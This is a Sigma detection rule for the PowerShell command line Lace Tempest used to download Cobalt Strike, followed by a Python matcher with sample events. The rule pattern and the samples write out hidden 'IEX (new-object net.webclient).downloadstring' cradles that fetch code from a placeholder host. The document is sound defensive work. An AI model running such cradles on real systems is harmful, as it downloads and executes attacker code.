Lace Tempest Cobalt Strike Download

Detects the specific command line used by Lace Tempest to download Cobalt Strike, as reported by the SysAid team.

Sigma rule

title: Lace Tempest Cobalt Strike Download
id: aa5b0a40-ed88-46aa-9fdc-0337b379ca9d
status: experimental
description: Detects specific command line execution used by Lace Tempest to download Cobalt Strike as reported by SysAid Team
references:
    - https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023/11/09
tags:
    - attack.execution
    - detection.emerging_threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(
            - /a')
    condition: selection
falsepositives:
    - Unlikely
level: high
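To show how the selection above behaves on telemetry, here is an added Python matcher (not part of the rule or of the Sigma project) that reproduces Sigma's case-insensitive `contains|all` semantics and runs it over constructed process_creation events; the sample events, their `CommandLine` field name and the placeholder URL host are assumptions for the example.

```python
from typing import Iterable

# Fragments copied verbatim from the rule's CommandLine|contains|all selection.
REQUIRED_FRAGMENTS = (
    "-nop -w hidden -c IEX ((new-object net.webclient).downloadstring(",
    "/a')",
)


def contains_all(command_line: str, fragments: Iterable[str] = REQUIRED_FRAGMENTS) -> bool:
    """Sigma 'contains|all': every fragment must occur in the field.

    Sigma string matching is case-insensitive by default, so both sides
    are lower-cased before the substring test.
    """
    haystack = command_line.lower()
    return all(fragment.lower() in haystack for fragment in fragments)


def matching_events(events: Iterable[dict]) -> list[dict]:
    """Return the process_creation events on which the selection fires."""
    return [event for event in events if contains_all(event.get("CommandLine", ""))]


# Constructed sample events (not real telemetry); the URL host is a placeholder.
SAMPLE_EVENTS = [
    {   # the shape described by the rule: both fragments present
        "CommandLine": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient)"
                       ".downloadstring('http://example.invalid/a'))",
    },
    {   # same cradle in mixed case: still matches, matching is case-insensitive
        "CommandLine": "PowerShell -NoP -W Hidden -C IEX ((New-Object Net.WebClient)"
                       ".DownloadString('http://example.invalid/a'))",
    },
    {   # same cradle with another path: first fragment hits, \"/a')\" does not
        "CommandLine": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient)"
                       ".downloadstring('http://example.invalid/update.ps1'))",
    },
    {   # ordinary administrative use of -nop: no match
        "CommandLine": "powershell.exe -nop -c Get-Service -Name Spooler",
    },
]

if __name__ == "__main__":
    for event in matching_events(SAMPLE_EVENTS):
        print("ALERT:", event["CommandLine"])
```

The third event shows the caveat worth keeping in mind: the `/a')` fragment ties the rule to the path seen in this campaign, so a variant of the same cradle fetching a different path satisfies only the first fragment and is not flagged.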
